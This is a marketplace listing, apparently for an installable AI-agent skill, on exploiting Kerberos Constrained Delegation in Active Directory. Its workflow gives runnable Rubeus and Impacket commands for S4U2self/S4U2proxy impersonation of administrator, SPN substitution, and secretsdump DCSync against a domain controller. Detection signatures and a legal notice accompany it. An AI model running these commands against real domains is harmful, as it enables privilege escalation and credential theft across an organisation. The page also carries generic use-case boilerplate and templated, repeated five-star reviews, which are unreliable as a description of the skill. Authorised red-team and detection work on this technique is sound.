exploiting-constrained-delegation-abuse▌
mukul975/Anthropic-Cybersecurity-Skills · updated May 25, 2026
MDX-style export adds YAML metadata + attribution linking explainx.ai and this canonical listing URL.
Exploit Kerberos Constrained Delegation misconfigurations in Active Directory to impersonate privileged users via S4U2self and S4U2proxy extensions for lateral movement and privilege escalation.
| name | exploiting-constrained-delegation-abuse |
| description | Exploit Kerberos Constrained Delegation misconfigurations in Active Directory to impersonate privileged users via S4U2self and S4U2proxy extensions for lateral movement and privilege escalation. |
| domain | cybersecurity |
| subdomain | red-teaming |
| tags | - red-team - active-directory - kerberos - constrained-delegation - s4u2proxy - privilege-escalation - lateral-movement |
| version | '1.0' |
| author | mahipal |
| license | Apache-2.0 |
| d3fend_techniques | - Application Protocol Command Analysis - Network Isolation - Network Traffic Analysis - Client-server Payload Profiling - Network Traffic Community Deviation |
| nist_csf | - ID.RA-01 - GV.OV-02 - DE.AE-07 |
Exploiting Constrained Delegation Abuse
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
Overview
Kerberos Constrained Delegation (KCD) is a Windows Active Directory feature that allows a service to impersonate a user and access specific services on their behalf. The delegation targets are defined in the msDS-AllowedToDelegateTo attribute. When an attacker compromises an account configured with Constrained Delegation (particularly with the TRUSTED_TO_AUTH_FOR_DELEGATION flag), they can use the S4U2self and S4U2proxy Kerberos protocol extensions to request service tickets as any user (including Domain Admins) to the delegated services. If the delegation target includes services like CIFS, HTTP, or LDAP on a Domain Controller, this results in full domain compromise. The S4U2self extension requests a forwardable ticket on behalf of any user to the compromised service, and S4U2proxy forwards that ticket to the allowed delegation target.
When to Use
- When performing authorized security testing that involves exploiting constrained delegation abuse
- When analyzing malware samples or attack artifacts in a controlled environment
- When conducting red team exercises or penetration testing engagements
- When building detection capabilities based on offensive technique understanding
Prerequisites
- Familiarity with red teaming concepts and tools
- Access to a test or lab environment for safe execution
- Python 3.8+ with required dependencies installed
- Appropriate authorization for any testing activities
Objectives
- Enumerate accounts with Constrained Delegation configured in the domain
- Identify delegation targets (msDS-AllowedToDelegateTo) for high-value services
- Exploit S4U2self and S4U2proxy to impersonate Domain Admin
- Obtain service tickets for delegated services as a privileged user
- Access delegated services (CIFS, LDAP, HTTP) on target hosts
- Escalate to Domain Admin through Constrained Delegation abuse
MITRE ATT&CK Mapping
- T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting
- T1550.003 - Use Alternate Authentication Material: Pass the Ticket
- T1134.001 - Access Token Manipulation: Token Impersonation/Theft
- T1078.002 - Valid Accounts: Domain Accounts
- T1021 - Remote Services
Workflow
Phase 1: Enumerate Constrained Delegation
- Find accounts with Constrained Delegation using PowerView:
# Find users with Constrained Delegation Get-DomainUser -TrustedToAuth | Select-Object samaccountname, msds-allowedtodelegateto # Find computers with Constrained Delegation Get-DomainComputer -TrustedToAuth | Select-Object samaccountname, msds-allowedtodelegateto # Using AD Module Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo, userAccountControl - Using Impacket findDelegation.py:
findDelegation.py domain.local/user:'Password123' -dc-ip 10.10.10.1 - Using BloodHound CE:
MATCH (c) WHERE c.allowedtodelegate IS NOT NULL RETURN c.name, c.allowedtodelegate - Check for the TRUSTED_TO_AUTH_FOR_DELEGATION flag (protocol transition):
# UserAccountControl flag 0x1000000 = TRUSTED_TO_AUTH_FOR_DELEGATION Get-DomainUser -TrustedToAuth | Select-Object samaccountname, useraccountcontrol
Phase 2: Exploit with Rubeus (Windows)
- If you have the password or hash of the constrained delegation account:
# Request TGT for the constrained delegation account Rubeus.exe asktgt /user:svc_sql /domain:domain.local /rc4:<ntlm_hash> # Perform S4U2self + S4U2proxy to impersonate administrator Rubeus.exe s4u /ticket:<base64_tgt> /impersonateuser:administrator \ /msdsspn:CIFS/DC01.domain.local /ptt # Alternative: specify alternate service name Rubeus.exe s4u /ticket:<base64_tgt> /impersonateuser:administrator \ /msdsspn:CIFS/DC01.domain.local /altservice:LDAP /ptt - Combined TGT request and S4U in single command:
Rubeus.exe s4u /user:svc_sql /rc4:<ntlm_hash> /impersonateuser:administrator \ /msdsspn:CIFS/DC01.domain.local /domain:domain.local /ptt
Phase 3: Exploit with Impacket (Linux)
- Request service ticket via S4U protocol extensions:
# Using getST.py with S4U getST.py -spn CIFS/DC01.domain.local -impersonate administrator \ -dc-ip 10.10.10.1 domain.local/svc_sql:'ServicePass123' # Using hash instead of password getST.py -spn CIFS/DC01.domain.local -impersonate administrator \ -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 \ -dc-ip 10.10.10.1 domain.local/svc_sql # Use the obtained ticket export KRB5CCNAME=administrator.ccache smbclient.py -k -no-pass domain.local/[email protected]
Phase 4: Alternate Service Name Abuse
- Kerberos service tickets are not validated against the SPN in the ticket, allowing SPN substitution:
# Request CIFS ticket, then use it for LDAP (DCSync) getST.py -spn CIFS/DC01.domain.local -impersonate administrator \ -altservice LDAP/DC01.domain.local \ -dc-ip 10.10.10.1 domain.local/svc_sql:'ServicePass123' export KRB5CCNAME=administrator.ccache secretsdump.py -k -no-pass domain.local/[email protected] - This technique works because the service name in the ticket is not cryptographically bound to the session key
Phase 5: Protocol Transition Attack
- If the account has TRUSTED_TO_AUTH_FOR_DELEGATION:
# S4U2self obtains a forwardable ticket without requiring the user to authenticate # This means we can impersonate ANY user without their password getST.py -spn CIFS/DC01.domain.local -impersonate administrator \ -dc-ip 10.10.10.1 domain.local/svc_sql:'ServicePass123' - Without TRUSTED_TO_AUTH_FOR_DELEGATION, S4U2self tickets are non-forwardable and S4U2proxy will fail (unless using Resource-Based Constrained Delegation)
Tools and Resources
| Tool | Purpose | Platform |
|---|---|---|
| Rubeus | S4U Kerberos ticket manipulation | Windows (.NET) |
| getST.py | S4U service ticket requests (Impacket) | Linux (Python) |
| findDelegation.py | Delegation enumeration (Impacket) | Linux (Python) |
| PowerView | AD delegation enumeration | Windows (PowerShell) |
| BloodHound CE | Visual delegation path analysis | Docker |
| Kekeo | Advanced Kerberos toolkit | Windows |
Delegation Types Comparison
| Type | Attribute | Scope | Attack Complexity |
|---|---|---|---|
| Unconstrained | TRUSTED_FOR_DELEGATION | Any service | Low (capture TGTs) |
| Constrained | msDS-AllowedToDelegateTo | Specific SPNs | Medium (S4U abuse) |
| Constrained + Protocol Transition | + TRUSTED_TO_AUTH_FOR_DELEGATION | Specific SPNs | Medium (no user auth needed) |
| Resource-Based (RBCD) | msDS-AllowedToActOnBehalfOfOtherIdentity | On target | Medium (writable attribute) |
Detection Signatures
| Indicator | Detection Method |
|---|---|
| S4U2self ticket requests | Event 4769 with unusual service and impersonation |
| S4U2proxy forwarded tickets | Event 4769 with delegation flags set |
| Alternate service name in ticket | Mismatch between requested SPN and actual service access |
| Rubeus.exe execution | EDR process detection, command-line logging |
| Delegation configuration changes | Event 5136 for msDS-AllowedToDelegateTo modifications |
Validation Criteria
- Accounts with Constrained Delegation enumerated
- Delegation targets (msDS-AllowedToDelegateTo) identified
- S4U2self ticket obtained for target user
- S4U2proxy ticket forwarded to delegation target
- Privileged access to delegated service validated
- Alternate service name substitution tested
- Protocol transition capability assessed
- Evidence documented with ticket exports and access proof
How to use exploiting-constrained-delegation-abuse on Cursor
AI-first code editor with Composer
Prerequisites
Before installing skills in Cursor, ensure your development environment meets these requirements:
- ›Cursor installed and configured on your development machine
- ›Node.js version 16.0+ with npm package manager (verify with
node --version) - ›Active project directory or workspace where you want to add exploiting-constrained-delegation-abuse
Execute installation command
Execute the skills CLI command in your project's root directory to begin installation:
The skills CLI fetches exploiting-constrained-delegation-abuse from GitHub repository mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
Select Cursor when prompted
The CLI will show a list of available agents. Use arrow keys to navigate and space to select Cursor:
Verify installation
Confirm successful installation by checking the skill directory location:
Reload or restart Cursor to activate exploiting-constrained-delegation-abuse. Access the skill through slash commands (e.g., /exploiting-constrained-delegation-abuse) or your agent's skill management interface.
Security & Verification Notice
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your development environment. Always verify the publisher's identity, review recent commits, and test in isolated environments before production deployment.
List & Monetize Your Skill
Submit your Claude Code skill and start earning
Use Cases▌
Task Automation & Efficiency
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Knowledge Enhancement
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Quality Improvement
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
Implementation Guide▌
Prerequisites
- ›Claude Desktop or compatible AI client with skill support
- ›Clear understanding of task or problem to solve
- ›Willingness to iterate and refine outputs
Time Estimate
15-45 minutes depending on use case complexity
Installation Steps
- 1.Install skill using provided installation command
- 2.Test with simple use case relevant to your work
- 3.Evaluate output quality and relevance
- 4.Iterate on prompts to improve results
- 5.Integrate into regular workflow if valuable
Common Pitfalls
- ⚠Expecting perfect results without iteration
- ⚠Not providing enough context in prompts
- ⚠Using skill for tasks outside its intended scope
- ⚠Accepting outputs without review and validation
Best Practices▌
✓ Do
- +Start with clear, specific prompts
- +Provide relevant context and constraints
- +Review and refine all outputs before using
- +Iterate to improve output quality
- +Document successful prompt patterns
✗ Don't
- −Don't use without understanding skill limitations
- −Don't skip validation of outputs
- −Don't share sensitive information in prompts
- −Don't expect skill to replace human judgment
💡 Pro Tips
- ★Be specific about desired format and style
- ★Ask for multiple options to choose from
- ★Request explanations to understand reasoning
- ★Combine AI efficiency with human expertise
When to Use This▌
✓ Use When
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid When
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
Learning Path▌
- 1Familiarize yourself with skill capabilities and limitations
- 2Start with low-risk, non-critical tasks
- 3Progress to more complex and valuable use cases
- 4Build expertise through regular use and experimentation
Discussion
Product Hunt–style comments (not star reviews)- No comments yet — start the thread.
Ratings
4.6★★★★★44 reviews- ★★★★★Chinedu Haddad· Dec 16, 2024
Keeps context tight: exploiting-constrained-delegation-abuse is the kind of skill you can hand to a new teammate without a long onboarding doc.
- ★★★★★Pratham Ware· Dec 8, 2024
Keeps context tight: exploiting-constrained-delegation-abuse is the kind of skill you can hand to a new teammate without a long onboarding doc.
- ★★★★★Yash Thakker· Nov 27, 2024
exploiting-constrained-delegation-abuse has been reliable in day-to-day use. Documentation quality is above average for community skills.
- ★★★★★Harper Tandon· Nov 7, 2024
exploiting-constrained-delegation-abuse has been reliable in day-to-day use. Documentation quality is above average for community skills.
- ★★★★★Ama Abebe· Oct 26, 2024
Solid pick for teams standardizing on skills: exploiting-constrained-delegation-abuse is focused, and the summary matches what you get after install.
- ★★★★★Dhruvi Jain· Oct 18, 2024
Solid pick for teams standardizing on skills: exploiting-constrained-delegation-abuse is focused, and the summary matches what you get after install.
- ★★★★★Olivia Iyer· Sep 21, 2024
Useful defaults in exploiting-constrained-delegation-abuse — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
- ★★★★★Chinedu Khan· Sep 21, 2024
Solid pick for teams standardizing on skills: exploiting-constrained-delegation-abuse is focused, and the summary matches what you get after install.
- ★★★★★Nia Johnson· Sep 21, 2024
exploiting-constrained-delegation-abuse has been reliable in day-to-day use. Documentation quality is above average for community skills.
- ★★★★★Liam Gill· Sep 13, 2024
exploiting-constrained-delegation-abuse fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
showing 1-10 of 44